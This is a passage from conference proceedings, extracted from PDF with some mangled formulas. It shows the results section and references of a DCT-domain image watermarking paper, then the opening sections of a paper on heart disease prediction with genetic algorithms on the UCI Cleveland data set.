Step 6: Choose two coefficients “bi” and “bj” in each block using the predefined
mathematical function.
Step 7: If “bi” is greater than “bj”, bit one is extracted, and if “bj” is greater than
“bi ”, bit zero is extracted.
Step 8: The predefined mathematical function is employed to reconstruct the
watermark from the encrypted watermark.

4 Experimental Results and Comparison

For testing and evaluation of performance, PSNR, NC, SSIM and BER values are
used. These values helped to measure the quality of watermarking such as robustness
and imperceptibility.
PSNR (Peak Signal to Noise Ratio)
PSNR is used to compare the imperceptibility of the cover image and watermarked
image. It is expressed in terms of logarithmic decibel scale.
 
(L ∗ L)
PSNR = 10 log 10 (5)
MSE

Here, L betokens peak signal values for the cover image, and it is 255 for the 8-bit
image. For better imperceptibility, high PSNR is needed. MSE is applied to compare
the quality of the image after inserting the watermark. It is measured as cumulative
squared error between host image and watermarked image. Lesser the value of MSE,
better will be the results.

M,N [I1 (m, n) − I2 (m, n)]
2
MSE = (6)
M∗N

where I 1 is host image and I 2 is the watermarked image.


NC (Normalized correlation)
It tells the discrepancy among the cover image and watermarked image. The
formula is represented by the below equation.
M N
i=1 j=1w(i, j)w  (i, j)
NC =     (7)
M N M N 
i=1 j=1 w(i, j) i=1 j=1 w (i, j)
38 M. Gupta and R. Rama Kishore

SSIM (Structural similarity)


SSIM is used to find out the comparability between the cover image and the image
embedded with watermark. Its value varies from −1 to +1. If images are identical,
then the resultant value is +1, and if images are fully dissimilar, then the resultant
value is 0. The values for the rest of the cases lie in between 0 and 1. SSIM equation
between two images x and y of size N × N is given below.

((2μx μy + c1 )(2σ x y + c2 ))
SSIM =  2   (8)
μx + μy 2 + c1 σ x 2 + σ y 2 + c2

At this place,
μx indicates average of x
μy indicates average of y
σx 2 indicates variance of x
σy2 indicates variance of y
σxy indicates covariance of x and y
cl = (k1 L)2 , c2 = (k2 L)2 the mentioned two variables stabilize the division by
the weak denominator
L indicates the dynamic range for the pixel value, and it is 2bits/pixel − 1
k 1 = 0.01 and k 2 = 0.03 by default.

BER (Bit Error Rate)


BER is a division of the number of bits in the error rate and the total number of
bits in the image. Lower is the value of BER, better are the results. The equation to
compute BER is given below.

Error Rate
BER = (9)
Size of Image

To evaluate the results, robustness and imperceptibility of the system are


measured. NC and BER are used to assess the robustness of the watermark’s informa-
tion. It provides the relationship for the inserted watermark and the obtained water-
mark. Concerning the evaluation of the visual quality, PSNR and SSIM are used. The
coding and testing of the proposed blind image watermarking technique are brought
to completion using MATLAB R2020a. This segment presents the experimental
outcomes of the suggested approach.
Imperceptibility Test: The results are compared using the existing methods. For
better comparison, standard images are used-namely that of Cameramen, Pepper,
Lena, Girl and Barbara. A greyscale image of resolution 512 × 512 is used for the
experiment, and a binary image of resolution 32 × 32 is used for the watermark
image. Table 1 shows the PSNR values of the proposed system. PSNR values are
greater than 40 dB, which shows good imperceptibility. SSIM values are computed
between the original image and the watermarked image. SSIM values are greater than
0.8, shown in Fig. 3, which indicates great similarity between the original image and
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 39

Table 1 PSNR values of the proposed method for distinctive images


Image name Original image Watermarked image PSNR (dB)
Lena 44.4274

Cameraman 43.1369

Pepper 41.4201

Girl 43.3583

Barbara 41.4759

the watermarked image. Furthermore, it also indicates good embedding strength in


the watermarked image.
Robustness Test: To test the robustness of the watermarked image, it undergoes
various types of attacks, namely median filter, average filter, resize, JPEG compres-
sion, rotation, histogram equalization, Weiner filter, Gaussian filter and translation.
Table 2 shows NC values under these attacks. Results are computed on standard
images, namely Lena, Cameraman, Girl, Barbara and Pepper. The value of NC is
one under all the attacks except for the average filter attack, cropping attack and
translation attack. The NC values imply that the extracted watermark is profoundly
correlated with the actual watermark and has a meagre error rate.
The proposed method maintains higher NC values. To analyse the robustness of the
proposed method comprehensively under various attacks, the strength of the attacks
40 M. Gupta and R. Rama Kishore

Chart Title
0.92

0.9

0.88

0.86
0.84

0.82
0.8

0.78

0.76
0.74
SSIM
Lena Barbara Pepper Girl Cameraman

Fig. 3 SSIM values for the original image and watermarked image

is varied. The results are shown through bar charts, covered between Figs. 4 and 9.
To check the robustness under the rotation attack, watermarked image is rotated by
−3 to + 3° with the increment of +1°. Results are shown in Fig. 4. On analysis, it
is apparent from the results that the minimum NC value is 0.97; it indicates good
imperceptibility. NC value decreases if the degree of rotation increases. Gaussian
noise is added to the image; the level of noise is varied from 1 to 5% with the
increment of 1%. NC value remains close to one with little to no change when the
noise is varied from 1 to 3%, and later with an increase in noise, NC value decreased.
Results are shown by the help of a bar chart in Fig. 5.
Robustness under the cropping attack is checked by cropping the watermark from
0 to 50% with the increment of 10%. The value of robustness (NC value) stays close
to one till 20% cropping. After 20% cropping, there is a decrease in NC value for
further increment in cropping. Figure 6 shows that the proposed method achieved
encouraging results. In order to figure out the robustness of the proposed method
under the JPEG compression attack, robustness is checked over different values
of quality factor. Quality factor (QF) shows the amount of information preserved
after compression. Greater QF value would mean more information is preserved
under compression attack. The value of NC is 1 for all the test images under the
compression attack while the range of QF is in between 100 and 60, and after that,
NC value decreases as QF decreases. Results are shown in Fig. 7.
The proposed method is calculated for robustness under the median filter attack.
The filter size is varied from 1 × 1 to 5 × 5. The minimum value of NC is more
than 0.95 under all the variations of the attack. Figure 8 shows the results of the
introduced method under this attack. Under Weiner filter attack, the value of NC
decreases when the filter size increases; the minimum value of NC is 0.95 for the
method. To calculate the robustness precisely, the filter size is varied from 1 × 1
to 5 × 5. Upon analysis under varied strengths of the attack, it is evident that the
Table 2 NC values and BER values of the proposed method
Attack Lena Cameraman Pepper Girl Barbara
BER NC BER NC BER NC BER NC BER NC
No attack 0 1 0 1 0 1 0 1 0 1
Median filter 0 1 0 1 0 1 0 1 0 1
Average filter 0.039 0.96 0.017 0.9957 0.0043 0.9957 0.039 0.9606 0.0065 0.9935
Resize 0 1 0 1 0 1 0 1 0 1
JPEG Compression 0 1 0 1 0 1 0 1 0 1
Rotation 0 1 0 1 0 1 0 1 0 1
Histogram equalization 0 1 0 1 0 1 0 1 0 1
Weiner filter 0 1 0 1 0 1 0 1 0 1
Gaussian filter 0 1 0 1 0 1 0 1 0 1
Translation 0.019 0.98 0.0025 0.9975 0.019 0.9808 0.011 0.989 0.003 0.997
Cropping 0.019 0.98 0.0031 0.9969 0.011 0.9989 0.008 0.992 0.002 0.998
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain
41
42 M. Gupta and R. Rama Kishore

Fig. 4 NC values for Rotation Attack,NC


rotation attack 1.02

1
0.98
0.96

0.94
-3 -2 -1 0 1 2
Lena Cameraman
Pepper Girl

Barbara

Fig. 5 NC values for Gaussian Noise,NC


Gaussian noise attack 1.05
1
0.95
0.9
0.85
0 1% 2% 3% 4%

Lena Cameraman
Pepper Girl
Barbara

Fig. 6 NC values for Cropping,NC


cropping attack 1.2
1
0.8
0.6
0.4
0.2
0
0 10% 20% 30% 40%

Lena Camerama

Pepper Girl

Barbara
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 43

Fig. 7 NC values for JPEG JPEG Compression Attack,NC


compression attack 1.05
1
0.95
0.9

0.85
20 40 50 60 80

Lena Cameraman
Pepper Girl
Barbara

Fig. 8 NC values for Median Filter Attack, NC


median filter attack 1.02
1

0.98
0.96

0.94

0.92
1 2 3 4 5
Lena Cameraman
Pepper Girl
Barbara

proposed method achieved great robustness as NC value lies in between 0.9 and 1.
Results are shown in Fig. 9.

Comparison with present methods The proposed method is put up against many
methods for comparing NC values and PSNR values, as shown in Tables 3 and 4.
It is clear to the understanding from Table 3 that current methods achieved lesser
PSNR values than the introduced method, which betokens better imperceptibility of
this method. Table 4 exhibits higher NC values that are obtained by the submitted
method than current methods. Under different attacks, the method can get NC value
close to 1, which is a clear proof of the method’s robustness.
44 M. Gupta and R. Rama Kishore

Fig. 9 NC values for Weiner Weiner Filter Attack, NC


filter attack 1.01
1
0.99
0.98
0.97
0.96
0.95
0.94
0.93
1 2 3 4 5
Lena Cemarma
Pepper Girl
Barbara

Table 3 PSNR value


Methods PSNR (dB)
comparison with the existing
state-of-the-art methods Proposed method 44.4274
Garg and Kishore [35] 42.6369
Prabha and Sam [47] 36.3689
Yuan et al. [48] 39.976

Table 4 NC value comparison with the existing state-of-the-art methods


S. No. Attack Proposed Garg and Kishore Prabha and Sam Yuan et al. [48]
[35] [47]
1 No attack 1 1 1 1
2 Median filter 1 1 1 0.914
3 Average filter 0.9606 0.9870 0.9134 0.9028
4 Resize 256 1 1 0.9888 0.9941
5 Jpeg 1 1 0.9979 0.9891
compression
6 Rotation 1 1 0.9045 0.9179
7 Histogram 1 1 0.9186 0.9045
equalization
8 Weiner filter 1 1 0.9431 0.9363
9 Gaussian 1 1 0.9363 0.9045
filter
10 Translation 0.9808 0.9606 0.9179 0.9026
11 Cropping 0.9801 0.9536 0.9438 0.9664
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 45

5 Conclusion

In this paper, the concepts of Shannon’s entropy in the DCT domain and water-
mark encryption are used to embed the watermark in the host image. The proposed
method embeds the watermark in such a way that extraction can be done blindly,
and at the same time, it provides a balance between robustness and imperceptibility.
The entropy-based block selection and encryption of the watermark with discrete
cosine transform give more reliable outcomes than common discrete cosine trans-
form methods in digital watermarking. Additionally, the watermarking technique is
secured for the reason that the process of encryption takes place before embedding
any watermark. The watermark persists under all the varied attacks as NC remains
close to value 1; this betokens that the method maintains high robustness. The image
continues to be imperceptible because the average PSNR value is 42.7362. The
proposed method is also adaptive, as embedding strength depends upon the charac-
teristics of the local block; this makes the method even more imperceptible. Results
are compared with existing methods [35, 47, 48], which authenticate that the proposed
method is relatively better.

References

1. Berghel, H., & O’Gorman, L. (1996). Protecting ownership rights through digital watermarking.
Computer, 29(7), 101–103.
2. Chang, C. C., Hwang, K. F., & Hwang, M. S. (2003). A digital watermarking scheme using
human visual effects. Informatica, 24(4), 505–511.
3. Alshanbari, H. S. (2020). Medical image watermarking for ownership and tamper detection.
Multimedia Tools Application.
4. Fazlali, H. R., Samavi, S., Karimi, N., et al. (2017). Adaptive blind image watermarking using
edge pixel concentration. Multimedia Tools Application, 76, 3105–3120.
5. Isinkaye, F., & Aroge, T. (2005). Watermarking techniques for protecting intellectual properties
in a digital environment. Journal of Computer Science and Technology, 12(27).
6. Giri, K., Quadri, S., & Bashir, R. (2018). DWT based colour image watermarking: A review.
Multimedia Tools Application, 79, 32881–32895.
7. Zebbiche, K., Khelifi, F., & Loukhaoukha, K. (2018). Robust additive watermarking in the
DTCWT domain based on perceptual masking. Multimedia Tools Application, 77, 21281–
21304.
8. Escalante-Ramírez, B., Gomez-Coronel, S. L. (2018). A perceptive approach to digital image
watermarking using a brightness model and the Hermite transform. Mathematical Problems in
Engineering, 2018, 19. Article ID 5463632.
9. Gaaed, M., Almutiri, M. T., Ben, O. (2018). Digital image watermarking based on LSB
techniques: A comparative study. International Journal of Computer Applications.
10. Su, Q., Decheng, L., Zihan, Y., et al. (2019). New rapid and robust colour image watermarking
technique in spatial domain. IEEE Access, 7, 30398–30409.
11. AL-ardhi, S., Thayananthan, V., & Basuhail, A. (2020). A new vector map watermarking
technique in frequency domain based on LCA-transform. Multimedia Tools Application, 79,
32361–32387.
12. Agarwal, N., & Singh, P. (2019). Survey of robust and imperceptible watermarking. Multimedia
Tools and Applications, 78. https://doi.org/10.1007/s11042-018-7128-5.
46 M. Gupta and R. Rama Kishore

13. Cox, I., Kilian. J., Leighton, F., & Shamoon, T. (1996). Secure spread spectrum watermarking
for multimedia. IEEE Transactions on Image Processing.
14. Khan, A. (2020). 2DOTS-multi-bit-encoding for robust and imperceptible image watermarking.
Multimedia Tools Application.
15. Singh, R., Shaw, D., Jha, S., & Kumar, M. (2017). A DWT-SVD based multiple watermarking
schemes for image-based data security. Journal of Information and Optimization Sciences, 39,
1–16. https://doi.org/10.1080/02522667.2017.1372153.
16. Feng, B., Yu, B., Bei, Y., & Duan, X. (2019). A reversible watermark with a new overflow
solution. IEEE Access, 7, 28031–28043.
17. Shih, F., & Zhong, X. (2016). Intelligent watermarking for high-capacity low-distortion data
embedding. International Journal of Pattern Recognition and Artificial Intelligence.
18. Savakar, D. G., & Ghuli, A. (2019). Robust invisible digital image watermarking using hybrid
scheme. Arabian Journal for Science and Engineering, 44, 3995–4008.
19. Garg, P., & Kishore, R. (2019). Performance comparison of various watermarking techniques.
Multimedia Tools and Applications, 79(35–36), 25921–25967.
20. Loan, N. A., Hurrah, N. N., Parah, S. A., Lee, J. W., Sheikh, J. A., & Bhat, G. M. (2018). Secure
and robust digital image watermarking using coefficient differencing and chaotic encryption.
IEEE Access, 6, 19876–19897.
21. Sanyal, N., Chatterjee, A., & Munshi, S. (2006). An adaptive bacterial foraging algorithm for
fuzzy entropy-based image segmentation. Expert Systems with Applications, 38(12), 15489–
15498.
22. Sharma, P. (2012). Analysis of image watermarking using least significant bit algorithm.
International Journal of Information Sciences and Techniques.
23. Boussif, M., Aloui, N., & Cherif, A. (2020). DICOM imaging watermarking for hiding medical
reports. Medical & Biological Engineering & Computing, 58, 2905–2918.
24. Byun, S., Son, H., & Lee, S. (2019). Fast and robust watermarking method based on DCT
specific location. IEEE Access, 7, 100706–100718.
25. Malik, S., & Reddlapalli, R. (2018). Histogram and entropy based digital image watermarking
scheme. International Journal of Information Technology.
26. Thanki, R., & Borra, S. (2019). Fragile watermarking for copyright authentication and tamper
detection of medical images using compressive sensing (CS) based encryption and contourlet
domain processing. Multimedia Tools Application, 78, 13905–13924.
27. Yang, C., Zhu, C., Wang, Y., et al. (2020). A robust watermarking algorithm for vector
geographic data based on QIM and matching detection. Multimedia Tools Application, 79,
30709–30733.
28. Mehta, R., Gupta, K., & Yadav, A. K. (2020). An adaptive framework to image watermarking
based on the twin support vector regression and genetic algorithm in lifting wavelet transform
domain. Multimedia Tools Application, 79, 18657–18678.
29. Deljavan, A., Meghdadi, M., & Amiri, A. (2018). HVS-based scalable image watermarking.
Multimedia Tools and Applications.
30. Celik, M., Sharma, U., Saber, G., & Tekalp, A. (2002). Hierarchical watermarking for secure
image authentication with localization. IEEE Transactions on Image Processing, 11(6), 585–
595.
31. Kumar, R., Das, R., Mishra, V., & Dwivedi, R. (2011). Fuzzy entropy-based neuro-wavelet
identifier-cum-quantifier for discrimination of gases/odours. IEEE Sensors Journal, 11(7),
1548–1555.
32. Alzubi, O. A., Nazir, J. A. A. S., & Hamdoun, H. (2015). Cyber attack challenges and resilience
for smart grids. European Journal of Scientific Research.
33. Yuan, Z., Liu, D., & Zhang, X., & Su, Q. (2019). New image blind watermarking method based
on two-dimensional discrete cosine transform. Optik, 164152.
34. Zhang, L., Yan, H., Zhu, R., et al. (2020). Combinational spatial and frequency domains
watermarking for 2D vector maps. Multimedia Tools Application, 79, 31375–31387.
35. Garg, P., & Kishore, R. (2020). Secured and multi optimized image watermarking using SVD
and entropy and prearranged embedding locations in transform domain. Journal of Discrete
Mathematical Sciences and Cryptography, 23(1), 73–82.
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 47

36. Mohammed, A., Salih, D., Saeed, A., et al. (2020). An imperceptible semi-blind image water-
marking scheme in DWT-SVD domain using a zigzag embedding technique. Multimedia Tools
Application, 79, 32095–32118.
37. Kamble, S., Maheshkar, V., Agarawal, S. V. (2010). Robust multiple watermarking using
entropy based spread spectrum. Communications in Computer and Information Science (CCIS),
94, 497–507.
38. Gul, E., & Ozturk, S. (2020). A novel triple recovery information embedding approach for
self-embedded digital image watermarking. Multimedia Tools Application, 79, 31239–31264.
39. Mehta, R., Rajpal, N., & Vishwakarma, V. (2016). Adaptive Image Watermarking Scheme
Using Fuzzy Entropy and GA-ELM hybridization in DCT domain for copyright protection.
Journal of Signal Processing Systems, 84, 265–328.
40. Mokhtari, Z., & Melkemi, K. (2011). A new watermarking algorithm based on entropy concept.
Acta Applicandae Mathematicae, 116, 65–69.
41. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Qiqieh, I., Rahim, R., Gupta, D., & Khanna,
A. (2020). Hashed Needham Schroeder Industrial IoT based cost optimized deep secured data
transmission in cloud. Measurement.
42. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Gayathri, N., & Patan. R. (2019). A survey of
specific IoT applications. International Journal on Emerging Technologies.
43. Pevný, T., Filler, T., & Bas, P. (2010). Using high-dimensional image models to perform highly
undetectable steganography. In Proceedings of International Workshop on Information Hiding,
Calgary Canada (pp. 161–177).
44. Liu, X., et al. (2019). A novel robust reversible watermarking scheme for protecting authenticity
and integrity of medical images. IEEE Access, 7, 76580–76598.
45. Dappuri, B., Rao, M. P., & Sikha, M. B. (2020). Non-blind RGB watermarking approach using
SVD in translation invariant wavelet space with enhanced Grey-wolf optimizer. Multimedia
Tools Application, 79, 31103–31124.
46. Tyagi, S., Singh, H., & Agarwal, R. (2017). Image watermarking using genetic algorithm in
DCT domain. In International Conference on Inventive Systems and Control (ICISC).
47. Prabha, K., & Sam, S. (2020). A novel blind color image watermarking based on Walsh
Hadamard transform. Multimedia Tools Application, 79, 6845–6869.
48. Yuan, Z., Liu, D., Zhang, X., et al. (2020). DCT-based color digital image blind watermarking
method with variable steps. Multimedia Tools Application, 79, 30557–30581.
Prediction of Heart Disease Using
Genetic Algorithm

Nagaraj M. Lutimath, H. V. Ramachandra, S. Raghav, and Neha Sharma

Abstract Medical practitioners depend on medical diagnosis systems for detection,


diagnosis, and treatment of various diseases in recent years. Genetic algorithms play a
vital role as an essential optimization approach for problems involving classification
in machine learning. Genetic algorithms can also achieve a high level of prediction
and accuracy. Coronary heart disorder is a major heart disorder that narrows the
blood vessels that supply oxygen to the heart. In this paper, we analyze and predict
heart diseases among patients using genetic algorithms. The heart disease data set
from the UCI machine learning repository data set is used. The proposed method
utilizes the data set on heart disease available at the UCI machine learning repository
and provides better classification accuracy and prediction among the patients with
various heart disorders. Implementation is carried out using Python language.

Keywords Classification · Genetic algorithm · Heart disease · Machine learning ·


Optimization · Prediction · Python

1 Introduction

Machine learning (ML) is a science that enables a computer to learn on its own
from the training process, without explicitly programming the computer. ML algo-
rithms can analyze historical data sets from different sources. Machine learning
techniques involve two types of data sets, a training data set needed to train the
model or algorithm, and a test data set used for predicting and classification of the
model.

N. M. Lutimath · N. Sharma (B)


Chandigarh University, Mohali 140413, Punjab, India
H. V. Ramachandra
CMR University, Bengaluru 562149, India
S. Raghav
Sir M Visvesvaraya Institute of Technology, Bengaluru 562157, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 49
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_4
50 N. M. Lutimath et al.

Across the world, one of the major cause for death among humans is heart attack.
People with heart disorders suffer from a severe illness, physical disability, and
decreased quality of life. By identifying proper risk factors, the heart’s diseases
can be easily detected early and controlled. Also, timely detection, diagnosis, and
treatment will reduce the cases of death related to heart diseases. Early identification
of heart disease is a critical issue. Traditional methods are ineffective in identifying
the presence of such diseases. So, current techniques like AI and machine learning
are more accurate and reliable and effective in detecting and diagnosing people with
heart ailments, leading to a reduction in mortality rate.
Using genetic algorithms, the proposed work is used to auto-tune classification
methods like random forest, XGBoost, and neural networks. Usage of genetic algo-
rithms improves the classification algorithm’s performance by identifying the most
prominent features in the heart disease data set. Genetic algorithms determine the
weights associated with the feature in the neural networks with less number of iter-
ations. The Z-Alizadeh Sani data set with details of 303 patients with examination
on ECG, echo, demographic, and Laboratory is used. The genetic algorithm model’s
computational results show that the overall performance can be further improved by
further use of ensemble process giving equal importance to all three models. Better
prediction accuracy of the disease was observed using classification procedures such
as Ada Boost, bagged trees, random forest, and majority voted output [1].
Heart is an important organ which pumps blood to various organs of the body.
Other vital organs like kidney and brain need sufficient supply of oxygen for their
functioning. Medical professional like cardiologists, thoracic, vascular, and inter-
ventional radiologists treats cardiovascular diseases. WHO has estimated around 12
million deaths due to heart disorder every year worldwide [2].
The paper is organized as follows with 4 sections; Sect. 2 describes the existing
literature and related work; Sect. 3 describes classification procedure; Sect. 4
describes classification methods used. Section 5 describes the characteristic feature
engineering of the attributes in the data set. Section 6 deals with prediction and
performance analysis, and Sect. 7 deals with the conclusion.

2 Related Work

Classification is a key learning concept for machine learning. It has three basic forms,
namely supervised, unsupervised, and semi-supervised classification. The predic-
tion model can be created using any of the three learning procedures using suitable
training data set. A heart disease diagnosis framework with machine intelligence was
presented for analysis [3]. The proposed framework used to predict the records of
heart patients, and the features of factor mixed analysis of data (FAMD) was utilized
to extract the derived attributes from the UCI heart disorder data set. Holdout vali-
dation approach was used for validation. Association rule approach for classifying
efficient data sets and appropriate rules was generated for the heart disorder [4].
Prioritization of rules was done. And also rules were categorized into original rules
Prediction of Heart Disease Using Genetic Algorithm 51

and pruned rules. The proposed system was efficient in decision making based on the
specified parameters. During the training of the model, tenfold validation method was
used. Accuracies of 86.3 and 87.3% were achieved in the training phase and testing
phase, respectively. Neural network for prediction is studied by many researchers.
Quality of prediction can be improved using neural network model. This approach
was a neural network augmented by another machine learning procedure called a
hybrid approach was proposed diagnosis for heart disorder [5]. Initial weights of
the neural networks can be enhanced using genetic algorithms, and the performance
of neural network was subsequently increased by 10%. During performance anal-
ysis, sensitivity and specificity rates of 93, 97, and 92% were achieved, respectively.
Data set from Z-Alizadeh Sani was used for analysis. Computer-aided techniques
are essential for the automated prediction of heart disorder suffering person. An
automated classification procedure between normal and heart disease patients using
ECG with the application of higher order statistics and spectra was proposed [6].
Automated heart disorder identification using nonlinear HOS attribute extraction
approach and ECG signals was done. A capable result was achieved when normal
and heart disorder affected ECG signals were used. Using 31 cumulate features, an
accuracy of 98.99% was achieved. In recent times, deep learning has become one
of the important areas of machine learning. It is concerned with multilayer neural
networks and motivated by the functioning and structure of the human brain. To
enhance deep learning method, a deep belief network with optimal configuration
for prediction of heart disease on Ruzzo–Tompa and stacked genetic algorithm was
proposed in [7]. Some of the important attributes were used for prediction of the
heart disorder along with three different types classification methods. XGBoost,
random forest, and neural networks were used with genetic algorithms [8]. The most
important attributes were used for maximizing classification using Z-Alizadeh Sani
data set with demographic examination, having 303 patients. The performance accu-
racy of the prediction model can be improved by choosing the correct sequence of
characteristics features. The research should aim to improve the prediction accu-
racy of the presence of cardiovascular disease by identifying significant features
data mining techniques [9]. Prediction models were developed by combining of
characteristic feature engineering from data sets and by utilizing classification tech-
niques like decision tree, Naive Bayes theorem, K-nearest neighbor, artificial neural
networks, logistic regression (LR) model, and support vector machine (SVM) to
name a few. The outcomes of the vote approach model on that the heart disease with
vital specified features predict with accuracy of 87.4% [10]. Multivariate analysis
is one of the vital methods in attribute selection. Logistic regression is utilized in
machine learning classification approach by using artificial neural networks. Along
with these classification techniques, evolutionary algorithms have evolved as one
of important procedures for predicting test models [11]. In recent years, investi-
gation and research toward classification techniques have drawn attention among
researchers. Improving the accuracy of the classification ensemble has become an
ultimate goal. Deep Learning is also a vital technique for classification [12]. An inno-
vative meta heuristic method with feature extraction and prediction was introduced
52 N. M. Lutimath et al.

for the purpose of usability. Usability is an important factor as defined by several


researchers in relation with hierarchical-based software usability [13].

3 Classification

The classification learning is normally a supervised procedure that takes an example


in the data set and identifies to it to a class attribute. An example has two parts
the predictor attribute values and target attribute values. Classification can be super-
vised, unsupervised, and semi-supervised in machine learning. In supervised learning
approach, examples consist of labeled classes. The classification learning approach
considers categorical values but the regression procedure takes numerical values. In
the unsupervised learning approach, the classes are not labeled but are grouped into
clusters as per their attribute characteristics. Semi-supervised learning utilizes both
labeled and unlabeled class data.
The classification learning is normally a supervised procedure that takes an
example in the data set and identifies to it to a class attribute. In classification,
the predictor attribute values are used to predict the values of target attribute value
and also to predict the class of an example.
The training and test data set are disjoint sets obtained by segregating the data set
during the classification procedure. The classification process consists of two stages,
namely training and testing phases. At the training stage, the model is trained on the
training data. After training stage, we use the trained model on the test data for the
prediction of the target attribute value.
Using the classification model, we can obtain the relationship between predictor
attribute value and the corresponding class to which it belongs. In the testing phase,
the actual class of the just classified example is predicted. If the data in the test
data set were not seen during training, the prediction accuracy can be improved. The
knowledge learned by a classification model can be described in the form decision
trees, artificial neural networks, and association rule learning to name a few.

4 Classification Methods

In the proposed work, we consider the important methods for classification namely
artificial neural network with genetic algorithm.

4.1 Artificial Neural Network

The artificial neural network is a perceptron neural network that can consist of
multiple layers. The single layer perceptron with no hidden layers can solve only
Prediction of Heart Disease Using Genetic Algorithm 53

solve problems which are linearly separable. But many of the recent trend real-time
problems are linearly separable and also complex. To solve such problems, multi-
layer neural networks with one or more hidden layers are to be added between the
input and output layer with error functions. These multilayer perceptron networks
are also known as feed-forward neural network. These multilayer neural networks
are used for medical image and data diagnostics, pattern recognition, classification
of input patterns, and autonomous vehicle.

4.2 Genetic Algorithm

Genetic algorithms are evolutionary optimized learning approach for performing


classification. It works on the principle of reproduction process in humans along
with the process of evolution. Genetic algorithms perform searching and producing
the fittest candidates as the solution using survival of fittest principle. These selected
individuals are then adapted to their new environment. Every chromosome or genome
in the population is represented using bit strings or gray codes. These genomes
encode phenotype which is the candidate solutions represented in 0 or 1. The evolu-
tion process starts selecting individual’s randomly among biological population. At
each iteration, the fitness value of each individual is collected, the fittest individuals
are selected, and the population is modified accordingly. The iterations in the algo-
rithm continue until a termination condition namely maximum generations have been
produced or a satisfactory fitness level is reached. GA requires the following, first
representation of the solution domain using genetics. Then a fitness function for eval-
uation of the solution domain is obtained. Unlike other classification models, genetic
algorithms can solve continuous or discrete variable nonlinear complex optimization
design problem without the need of gradient information.
Basic objective of a genetic algorithm is to combine the fittest and qualified
members of the current generation and produce more qualified. During the repro-
duction process, members are selected based on the fitness criteria. During this
process, the fittest more compatible individuals of the current generation will prob-
ably generate the next population. Rroulette wheel and stochastic universal sampling
(SUS) are some of the selection operators used during the algorithm. The main opera-
tors of the genetic algorithms are reproduction, crossover, and mutation are performed
to improve the fitness function.

5 Feature Engineering

Data set repository for heart disorder from UCI is used for the process of classifi-
cation. Training and test data sets are obtained by segregating the data set. During
feature engineering, we consider suitable attributes for training the model. The trained
classification model is then used to predict the class of the examples in the test data.
54 N. M. Lutimath et al.

The problem statement is described as follows:


To predict the value among the patients suffering from heart related disorders using Genetic
Algorithm.

The feature attributes contributing to the prediction of heart disease are defined
as data fields as shown below.
The data set has the following attributes as data fields,
c_age—This characteristic feature of the attribute indicates the age in terms of
number of years.
c_sex—The characteristics of this feature indicate the sex of the patient, specified
in male and female with a value of 1 and 0, respectively.
c_cp—The characteristics of this feature indicate the chest pain category for
typical angina, a typical angina, and asymptomatic category with values 1, 2, and
3, respectively.
c_trestbps—The value of BP at rest when the patient is admitted. It is measured
in mm/Hg.
c_chol—The feature is used for serum cholesterol measured in mg/dl.
c_fbs—It represents the level of fasting blood sugar. It is true or 1 when the
measured fasting blood sugar is more than 120 mg/dl otherwise considered to be
false or 0.
c_restecg—Specified as 0 for normal and 1 for wave abnormality in ST-T with
inversion in T wave and/or evaluation or depression in ST with >0.05 mV. Definite
observation of left ventricular hypertrophy by Estes’ criteria is represented by a
value of 2.
c_thalach—This attribute is specified for person suffering from maximum heart
rate.
c_exang—The characteristic feature of this attribute with values of 1 and 0 where
1 for exercise induced angina with categorical values of yes and no.
c_oldpeak—The characteristic feature of this attribute is for ST depression made
by exercise relative to rest.
c_slope—Which represents ST segment peak exercise slop indicated by values
of 1, 2, and 3 up, flat and down sloping is, respectively.
c_ca—The count of major vessels from 0 to 3 for fluoroscopy coloring.
c_num—This attribute represents the prediction of the persons with heart disorder.
Out of 303 tuples in the UCI data set repository of the Cleveland data set on the
heart disease, 212 examples are used during the training phase and other are used as
records in test data. The data set for training and test data is created using Python
code as shown in Eq. (1),

train = df. iloc[0 : 212 :] (1)

The genetic algorithm formula to train the model calculated using Eqs. 2 and 3 in
Python is given below, In Eq. 2, log model is constructed, and in Eq. 3, the genetic
model is developed.
Prediction of Heart Disease Using Genetic Algorithm 55
 
logmodel.fit X− train.iloc [: chromo [−1]], yt rain (2)

chromo, score = generations(size = 100, n_ feat = 10, n_parents = 5,


mutation_rate = 0.05, n_gen = 4, X_train = X_train,
X_test = X_test, y_train = y_train, y_test = y_test) (3)

5.1 Performance Measures

The three performance measures used in this work are mean absolute error (MAE),
which is obtained by calculating the difference of the mean between absolute actual
and predicted values, mean squared error (MSE) and root mean squared error (RMSE)
for predictive analysis.
MAE is given by,

MAE = |(yi − oi )| (4)

In Eq. 4, MAE is the mean absolute error, yi is the ith actual data set, and oi is the
ith predicted data set value.
RMSE is defined as the square root of the average of squared errors. It is given
by,


 
n
RMSE =  1/n ( f i − oi ) (5)
i=1

In Eq. 5, root mean square error is represented by RMSE, n indicates number of


examples, f i is the ith predicted value, and oi is the actual value.
MSE is calculated by finding the mean of the sum of squares of the actual target
and predicted values of the tuples in the data set.

1
n
MSE = (yi − oi ) (6)
n i=1

In Eq. 6, MSE is the mean squared error, yi is the ith value of a instance in the
data set, oi is the ith predicted instance value of data set, and n indicates the number
of test samples.
56 N. M. Lutimath et al.

6 Prediction Analysis

In this study of prediction analysis, preprocessing of data set is done first. After
preprocessing, we evaluate the mean of the attribute values for representing the
missing data. The performance measures used during the prediction process are
namely MAE, RMSE, and MSE. These measures are calculated using the training
and test models on the heart disease data set. Observing Table 1, the value of MAE
is lesser than MSE and RMSE. In Table 2, we find the MAE and MSE are minimum
when c_sex is female with values of 0.44 and 1.06, respectively. Thus, when c_sex
attribute represents female, the model performs better prediction.
Now looking at Table 3, we observe that when c_cp equals 1 MAE and MSE
have a lower value of 0.29 and 0.29, respectively. Thus, c_cp attribute contributes for
improved prediction accuracy of the model. Deviation from actual values is observed
in the prediction model when MAE and MAE have highest values of 0.95 and 2,
respectively. Now analyzing the contents of Table 4, we observe that MAE and MSE

Table 1 Values of MAE,


Error_type Value
SSE, and MSE for overall
data set MAE 0.62
